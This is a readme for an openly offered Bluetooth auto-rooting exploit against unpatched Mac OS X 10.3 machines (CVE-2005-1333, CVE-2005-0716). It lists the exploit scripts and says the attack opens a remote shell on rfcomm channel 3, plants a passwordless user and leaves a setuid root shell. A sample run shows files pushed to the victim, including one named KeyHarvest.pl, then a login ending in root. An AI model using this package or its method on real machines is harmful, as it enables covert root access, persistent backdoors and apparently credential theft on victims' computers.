GenerationTwo-10.3.tar If you are trying to exploit 10.4 you need a different tarball!

10.3-plant_input_manager-authopen.pl   is for 10.3.8 and below using a CF_CHARSET_PATH overflow
10.3-plant_input_manager-excploit.pl   will exploit 10.3.9 using a kernel overflow

Auto rooter for Bluetooth enabled Macintosh machines that are not 
patched to CVE-2005-1333 and CVE-2005-0716.

APPLE-SA-2005-03-21 and APPLE-SA-2005-05-03 address the issues involved 
in the exploitation process. 

This exploit provides a remote shell on rfcomm channel 3. A user of 
'pwned mghee' aka 'bluetooth' has been added with no password. You 
should find a setuid root shell in your home dir. 

Here is a sample run against my stock macmini with the original install 
disk. (10.3.7) 

kfinisterre@threat:~$ cd GenerationTwo-10.3/
kfinisterre@threat:~/GenerationTwo-10.3$ ./10.3-AutoRoot
00:14:51:5A:3D:99 kf...s
using kf
Connected to 00:14:51:5A:3D:99.
ftp> ftp> ftp> ftp> ftp> ftp> 458 bytes sent
ftp> ftp> ftp> ftp> ftp> ftp> ftp> 173324 bytes sent
ftp> ftp> 2057 bytes sent
ftp> 1464 bytes sent
ftp> 1042 bytes sent
ftp> 17000 bytes sent
ftp> 17000 bytes sent
ftp> 90812 bytes sent
ftp> 2743 bytes sent
ftp> 1658 bytes sent
ftp> 2342 bytes sent
ftp> drwxr-xr-x            Aug 15 00:42 ..
drwxr-xr-x            Aug 15 00:42 501
-rw-r--r--       2057 Aug 15 00:42 authopen-CF_CHARSET.pl
-rw-r--r--       1464 Aug 15 00:42 KeyHarvest.pl
-rw-r--r--       2743 Aug 15 00:42 login.config
-rw-r--r--        640 Aug 15 00:42 mcx_compositor
-rw-r--r--      90812 Aug 15 00:42 mgetty
-rw-r--r--       1658 Aug 15 00:42 mgetty.config
-rw-r--r--       1042 Aug 15 00:42 pwn
-rw-r--r--      17000 Aug 15 00:42 sh
-rw-r--r--      17000 Aug 15 00:42 shX
-rw-r--r--       2342 Aug 15 00:42 ttys
ftp> Disconnected.
Connected to 00:14:51:5A:3D:99.
ftp> Disconnected.

(computer is rebooting) 

kfinisterre@threat:~$ rfcomm connect 0 00:14:51:5A:3D:99 3
Connected /dev/rfcomm0 to 00:14:51:5A:3D:99 on channel 3
Press CTRL-C for hangup

kfinisterre@threat:~$ minicom

Welcome to minicom 2.1

OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n
Compiled on Nov  5 2005, 15:45:44.

Press CTRL-A Z for help on special keys

k-fs-Computer.local!login: pwned mghee
Password:
Last login: Tue Aug 15 00:45:09 on tty.Blue
Welcome to Darwin!
k-fs-Computer:~ bluetooth$ ls -al
total 48
drwxr-xr-x  4 bluetoot  666      136 15 Aug 00:45 .
drwxrwxr-t  8 root      admin    272 15 Aug 00:26 ..
-rw-------  1 bluetoot  666        5 15 Aug 00:45 .bash_history
-rwsr-xr-x  1 root      666    17000 15 Aug 00:42 shX
k-fs-Computer:~ bluetooth$ ./shX
csh: No entry for terminal type "unknown"
csh: using dumb terminal settings.
[k-fs-Computer:~] bluetoot# id
uid=0(root) gid=0(wheel) groups=0(wheel)

